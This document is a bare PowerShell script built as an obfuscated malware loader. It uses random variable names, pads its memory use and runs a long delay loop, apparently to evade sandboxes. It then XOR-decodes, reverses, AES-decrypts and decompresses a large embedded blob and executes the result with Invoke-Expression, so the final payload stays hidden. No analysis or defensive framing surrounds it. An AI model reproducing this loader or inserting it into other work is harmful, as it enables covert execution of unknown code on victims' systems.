$iznkjsxxmsnnyg = (Get-Process -Id $PID | Select-Object Name,@{Name="WorkingSet";Expression={($_.ws / 1024kb)}}).WorkingSet
if ($iznkjsxxmsnnyg -lt 250) { $sqtqryhtwxhrq = "a" * 300MB }
$xxkjhrogpqqiyxy = 0
$yjmsimwtrthrtuw = 30000000
For ($xxkjhrogpqqiyxy=0; $xxkjhrogpqqiyxy -lt $yjmsimwtrthrtuw;$xxkjhrogpqqiyxy++) { $xxkjhrogpqqiyxy++ }
$zomuynmzrkoiihq = [System.Text.Encoding]::UTF8.GetBytes("njwkynqwrhph")
$mjmkyntsxgqrh = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"))
$ivnzrhzmrxsinkhgi = [System.Text.Encoding]::UTF8.GetBytes($mjmkyntsxgqrh)
$uoujyjyuomwi = $(for ($soyiqymqrhqg = 0; $soyiqymqrhqg -lt $ivnzrhzmrxsinkhgi.length; ) {
    for ($ioupmhsipqp = 0; $ioupmhsipqp -lt $zomuynmzrkoiihq.length; $ioupmhsipqp++) {
        $ivnzrhzmrxsinkhgi[$soyiqymqrhqg] -bxor $zomuynmzrkoiihq[$ioupmhsipqp]
        $soyiqymqrhqg++
        if ($soyiqymqrhqg -ge $ivnzrhzmrxsinkhgi.Length) {
            $ioupmhsipqp = $zomuynmzrkoiihq.length
        }
    }
})
$uoujyjyuomwi = [System.Text.Encoding]::UTF8.GetString($uoujyjyuomwi)
$uvrtrtuinuxkpwpu = "$uoujyjyuomwi"
$mujsggvpznpkxrth = $uvrtrtuinuxkpwpu.ToCharArray()
[array]::Reverse($mujsggvpznpkxrth)
$ztmigzkkxvshxxvp = -join($mujsggvpznpkxrth)
$zzttuzxizjk = [System.Convert]::FromBase64String("$ztmigzkkxvshxxvp")
$yqjrwtmvhwshxsoh = [System.Convert]::FromBase64String("b+UFaw8E/VtTRxxb0KG9KZnuugEWcwIe5uc522UnxCg=")
$uogqsyxvjwxvqmuzq = "==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U"
$njkpvwtzjm = $uogqsyxvjwxvqmuzq.ToCharArray()
[array]::Reverse($njkpvwtzjm)
$mitssuyjznmopm = -join($njkpvwtzjm)
$kqvkvgqipkunkkyh = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($mitssuyjznmopm))
$spignxkmzkwnroqg = New-Object "$kqvkvgqipkunkkyh"
$unntkmnmkovnpks = "==wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$ynqhxtxwzoqyyt = $unntkmnmkovnpks.ToCharArray()
[array]::Reverse($ynqhxtxwzoqyyt)
$ikkkktjnov = -join($ynqhxtxwzoqyyt)
$kkzhonsgpnounx = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ikkkktjnov))
$ymttrhtyituk = & ([scriptblock]::Create($kkzhonsgpnounx))
$spignxkmzkwnroqg.Mode = $ymttrhtyituk
$roskstgygijnnimw = "==wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$uhsktuiyttktp = $roskstgygijnnimw.ToCharArray()
[array]::Reverse($uhsktuiyttktp)
$rxptjtpuwjnijjkk = -join($uhsktuiyttktp)
$ijsroujmwsjznz = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($rxptjtpuwjnijjkk))
$nrwnorvzkvgg = & ([scriptblock]::Create($ijsroujmwsjznz))
$spignxkmzkwnroqg.Padding = $nrwnorvzkvgg
$spignxkmzkwnroqg.BlockSize = 128
$spignxkmzkwnroqg.KeySize = 128
$spignxkmzkwnroqg.Key = $yqjrwtmvhwshxsoh
$spignxkmzkwnroqg.IV = $zzttuzxizjk[0..15]
$gxpqkzynths = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLk1lbW9yeVN0cmVhbQ=="))
$opkxousqtqhpt = New-Object $gxpqkzynths(,$spignxkmzkwnroqg.CreateDecryptor().TransformFinalBlock($zzttuzxizjk,16,$zzttuzxizjk.Length-16))
$ukthpvotzx = New-Object $gxpqkzynths
$qqiyiuuqur = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RGVjb21wcmVzcw=="))
$rjnqptjktynzzwmjg = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV0="))))
$stvgsmrtzpzvot = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLkNvbXByZXNzaW9uLkRlZmxhdGVTdHJlYW0="))
$tozgvizsmp = New-Object $stvgsmrtzpzvot $opkxousqtqhpt, ($rjnqptjktynzzwmjg::$qqiyiuuqur)
$tozgvizsmp.CopyTo($ukthpvotzx)
$tozgvizsmp.Close()
$spignxkmzkwnroqg.Dispose()
$opkxousqtqhpt.Close()
$zpkwjxnuxrxtkm = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5UZXh0LkVuY29kaW5nXQ=="))))
$nwnqjnpjikmiwuhzq = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VVRGOA=="))
$gviukgmtigqzxoms = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VG9BcnJheQ=="))
$ghsiogvmsnj = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("R2V0U3RyaW5n"))
$jkkyrgsosvqvmpw = $zpkwjxnuxrxtkm::$nwnqjnpjikmiwuhzq.$ghsiogvmsnj($ukthpvotzx.$gviukgmtigqzxoms())
Invoke-Expression($jkkyrgsosvqvmpw)
